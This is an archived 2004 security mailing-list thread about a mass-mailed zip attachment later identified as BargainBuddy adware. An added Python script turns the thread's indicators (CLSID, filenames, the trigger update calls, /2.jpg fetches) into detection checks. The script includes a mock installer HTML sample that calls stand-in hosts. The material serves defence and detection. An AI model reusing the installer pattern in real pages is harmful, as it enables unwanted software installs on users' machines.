Security Incidents mailing list archives
Re: New Mass Mailer Virus
From: "Thor" <thor () hammerofgod com>
Date: Mon, 9 Aug 2004 15:34:36 -0700
This one's not being caught by AV (Trend, anyway) -- the zip file appears to have a randomized integer appended to the name. I've seen both price2.zip and price_8.zip.

Looks like Price.htm checks browser settings and does a document.write to install under IE with CLSID:018B7EC3-EECA-11d3-8E71-0000E82C6C0D; if Netscape, it launches and installs trigger.UpdateEnabled, then uses the trigger.startsoftwareupdate method. However, I show that as adware/spyware, not a Bagle variant... BargainBuddy, specifically.

However, it does have probably 100 web sites hard-coded into the exe that try to pull up www.domain.com/2.jpg. It is always 2.jpg, looks like, but I was not able to get to that file on any of the referenced sites -- got 404's on all but one, where I got "The image "http://www.dynex.ru/2.jpg" cannot be displayed, because it contains errors."

Just cursory observations...

T

----- Original Message -----
From: "Jeff pRICHER" <jeffpricher () yahoo com>
To: <incidents () securityfocus com>
Sent: Monday, August 09, 2004 2:19 PM
Subject: New Mass Mailer Virus
Looks like a new Bagle variant is on the loose. I saw several hundred in my SMTP filter so far today. They have been arriving in a zip file with price.exe and price.html as the payload. It took some digging to find any information on the web for this, and so far the best I've found is from SANS and can be read here: http://isc.sans.org/
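An added example for the mail-gateway side of this thread, not code from either poster: it turns the observations above (price*.zip with a random integer, price.exe/price.html inside, an .htm that does a document.write of the quoted CLSID under IE, trigger.UpdateEnabled/StartSoftwareUpdate for Netscape, and hard-coded /2.jpg fetches) into simple indicator checks. The CLSID and filenames come from the thread; the function names, the sample HTML and the example.invalid hosts are constructed for illustration.

```python
import re

# CLSID the thread reports for the IE install path (value taken from the page).
BARGAINBUDDY_CLSID = "018B7EC3-EECA-11d3-8E71-0000E82C6C0D"

# Attachment names seen in the thread: price.zip, price2.zip, price_8.zip.
ZIP_NAME_RE = re.compile(r"^price_?\d*\.zip$", re.IGNORECASE)
PAYLOAD_NAMES = {"price.exe", "price.html", "price.htm"}

# Content indicators for the .htm: CLSID, document.write, Netscape trigger
# calls, and the hard-coded /2.jpg fetches.
HTML_INDICATORS = {
    "clsid": re.compile(re.escape(BARGAINBUDDY_CLSID), re.IGNORECASE),
    "document_write": re.compile(r"document\.write\s*\(", re.IGNORECASE),
    "netscape_trigger": re.compile(
        r"trigger\.(?:UpdateEnabled|StartSoftwareUpdate)", re.IGNORECASE),
    "jpg_beacon": re.compile(r"https?://[^\s\"'<>]+/2\.jpg", re.IGNORECASE),
}

def suspicious_attachment(filename: str, members: list[str]) -> bool:
    """True when a zip's name and member list match the thread's description."""
    if not ZIP_NAME_RE.match(filename):
        return False
    return any(m.lower() in PAYLOAD_NAMES for m in members)

def scan_html(text: str) -> dict[str, list[str]]:
    """Map each indicator name to the strings it matched in the .htm body."""
    hits = {}
    for name, rx in HTML_INDICATORS.items():
        found = [m.group(0) for m in rx.finditer(text)]
        if found:
            hits[name] = found
    return hits

def beacon_hosts(text: str) -> set[str]:
    """Hostnames behind the /2.jpg fetches, for proxy-log searches or blocklists."""
    return {re.sub(r"^https?://([^/]+)/.*$", r"\1", u)
            for u in HTML_INDICATORS["jpg_beacon"].findall(text)}

# Constructed sample imitating the structure Thor describes; not the real Price.htm.
SAMPLE_HTML = """<script>
if (navigator.appName == "Microsoft Internet Explorer") {
  document.write('<object classid="clsid:018B7EC3-EECA-11d3-8E71-0000E82C6C0D"></object>');
} else if (trigger.UpdateEnabled()) {
  trigger.StartSoftwareUpdate("http://www.example.invalid/2.jpg");
}
</script>
<img src="http://cdn.example.invalid/2.jpg">"""
```

Running `scan_html` over a quarantined .htm and `beacon_hosts` over the result gives the hosts to look for in proxy logs, which is where the "always 2.jpg" fetch pattern shows up even when AV misses the zip.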